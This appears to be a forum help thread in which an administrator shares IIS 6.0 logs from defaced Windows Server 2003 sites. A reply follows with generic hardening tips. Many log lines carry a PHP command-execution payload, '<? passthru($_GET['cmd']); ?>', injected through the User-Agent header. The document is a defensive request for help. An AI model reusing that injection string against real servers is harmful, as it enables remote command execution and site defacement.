Question : windows server 2003 server hack issue

Recently our server hacked by pakbugs,
I don't understand how hacker create and replace some home page (default.htm, index.htm, default.asp) without login the server or ftp access

Kindly help me to secure my server.

The following thing server running on our server.

IIS 6.0
tomcat 5
merak mailserver
cold fusion 4.5

I have check the following logs but unable to understand the issue

Frist website hack logs
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-07 14:48:39
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status

sc-substatus sc-win32-status time-taken
2010-01-07 14:48:39 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 123.201.132.126 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.1;+Trident/4.0;

+GTB6.3;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+InfoPath.2) - delldigitalschoolathon.com 403 14 5 437
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 03:58:18
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status

sc-substatus sc-win32-status time-taken
2010-01-08 03:58:17 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> - delldigitalschoolathon.com 403 14 5 656
2010-01-08 03:58:17 W3SVC1896362308 WTRS10138 198.65.102.164 GET /favicon.ico - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> - delldigitalschoolathon.com 404 0 2 281
2010-01-08 03:58:24 W3SVC1896362308 WTRS10138 198.65.102.164 GET /favicon.ico - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> - delldigitalschoolathon.com 404 0 2 3531
2010-01-08 03:59:12 W3SVC1896362308 WTRS10138 198.65.102.164 GET /index.htm - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> - delldigitalschoolathon.com 200 0 0 578
2010-01-08 03:59:13 W3SVC1896362308 WTRS10138 198.65.102.164 GET /index.htm - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> http://delldigitalschoolathon.com/ delldigitalschoolathon.com 200 0 0 562
2010-01-08 04:00:03 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> - delldigitalschoolathon.com 403 14 5 406
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 04:24:28
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status

sc-substatus sc-win32-status time-taken
2010-01-08 04:24:28 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 121.242.204.200 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+Trident/4.0;

+GTB6.3;+InfoPath.2;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - www.delldigitalschoolathon.com 403 14 5 734
2010-01-08 04:24:58 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 121.242.204.200 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+Trident/4.0;

+GTB6.3;+InfoPath.2;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - www.delldigitalschoolathon.com 403 14 5 453
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 05:50:24
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status

sc-substatus sc-win32-status time-taken
2010-01-08 05:50:23 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> - delldigitalschoolathon.com 403 14 5 703
2010-01-08 05:50:26 W3SVC1896362308 WTRS10138 198.65.102.164 GET /favicon.ico - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> - delldigitalschoolathon.com 404 0 2 2640
2010-01-08 05:50:26 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> - delldigitalschoolathon.com 403 14 5 453
2010-01-08 05:50:27 W3SVC1896362308 WTRS10138 198.65.102.164 GET /favicon.ico - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> - delldigitalschoolathon.com 404 0 2 281
2010-01-08 05:50:51 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> - delldigitalschoolathon.com 200 0 0 3421
2010-01-08 05:50:51 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> http://delldigitalschoolathon.com/? delldigitalschoolathon.com 200 0 0 625
2010-01-08 05:50:56 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> - delldigitalschoolathon.com 200 0 0 578
2010-01-08 05:50:57 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+hru($_GET['cmd']);+?> http://delldigitalschoolathon.com/ delldigitalschoolathon.com 200 0 0 562
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 06:12:49
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status

sc-substatus sc-win32-status time-taken
2010-01-08 06:12:49 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 217.162.28.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.1;

+Trident/4.0) - delldigitalschoolathon.com 200 0 0 484
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 06:37:51
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status

+++++++++++
I also got hack website entry http://zone-h.org
http://zone-h.org/mirror/id/10095659

sc-substatus sc-win32-status time-taken
2010-01-08 06:37:51 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 210.212.184.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;

+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729) http://zone-h.org/mirror/id/10095659 delldigitalschoolathon.com 200 0 0

875
2010-01-08 06:37:59 W3SVC1896362308 WTRS10138 198.65.102.164 GET /admin - 80 - 210.212.184.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET

+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729) - delldigitalschoolathon.com 404 0 2 296

+++++++++++++++++++++++++++++++++++++++++
+++++++++++++
Second website logs
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-07 12:01:12
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-07 12:01:11 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 208.91.115.10 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.7.5)+Gecko/20041107+Firefox/1.0 - aqr.tyroo.com 403 14 5 468
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 05:52:45
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 05:52:44 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 403 14 5 734
2010-01-08 05:52:44 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 404 0 2 281
2010-01-08 05:52:47 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 404 0 2 281
2010-01-08 05:53:08 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 200 0 0 1078
2010-01-08 05:53:09 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://aqr.tyroo.com/ aqr.tyroo.com 200 0 0 640
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 06:12:49
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 06:12:48 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 217.162.28.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.1;+Trident/4.0) - aqr.tyroo.com 200 0 0 250
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 07:43:17
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 07:43:17 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 213.6.216.139 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+ar;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7 http://zone-h.org/mirror/id/10095660 aqr.tyroo.com 200 0 0 734
2010-01-08 07:43:17 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 213.6.216.139 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+ar;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7 - aqr.tyroo.com 404 0 2 203
2010-01-08 07:43:20 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 213.6.216.139 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+ar;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7 - aqr.tyroo.com 404 0 2 203
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 08:31:04
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 08:31:03 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 121.242.197.70 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7+(.NET+CLR+3.5.30729) - aqr.tyroo.com 403 14 5 859
2010-01-08 08:31:04 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 121.242.197.70 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7+(.NET+CLR+3.5.30729) - aqr.tyroo.com 404 0 2 343
2010-01-08 08:31:07 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 121.242.197.70 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7+(.NET+CLR+3.5.30729) - aqr.tyroo.com 404 0 2 328
2010-01-08 08:31:09 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 121.242.197.70 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7+(.NET+CLR+3.5.30729) - aqr.tyroo.com 403 14 5 531
++++++++++++++++

I also found an entry
http://zone-h.org/mirror/id/10095659

Regards,
Naresh

Answer : windows server 2003 server hack issue

if you have a own server; restrict ftp access to certain IPs. that will help a lot.

define the default document in IIS, remove unnecessary default documents for a site

check the program code properly for sql injection possibility.

by the way,
create a new folder and configure the site when you out the site again.

have a good antivirus [like symantec end point protection] that detects unauthorized entries and injections.

hope this helps

Random Solutions

Why is the Remote Install Tab not showing up in the active directory after I install RIS on a server?

MVVM WPF: Binding Problems

SQL Sorting Issue

ISA 2000 Specified service does not exist as an installed service

Expr field in VFp9.0 report designer

How Can I forward email from a mailbox to a distribution list in exchange 2003 using a forwarder?

How to run a MS Access Query?

VFP dynamic inputmask

Run a PowerPoint Tutorial Before User Log In

Hyperlinked InfoPath Form within SharePoint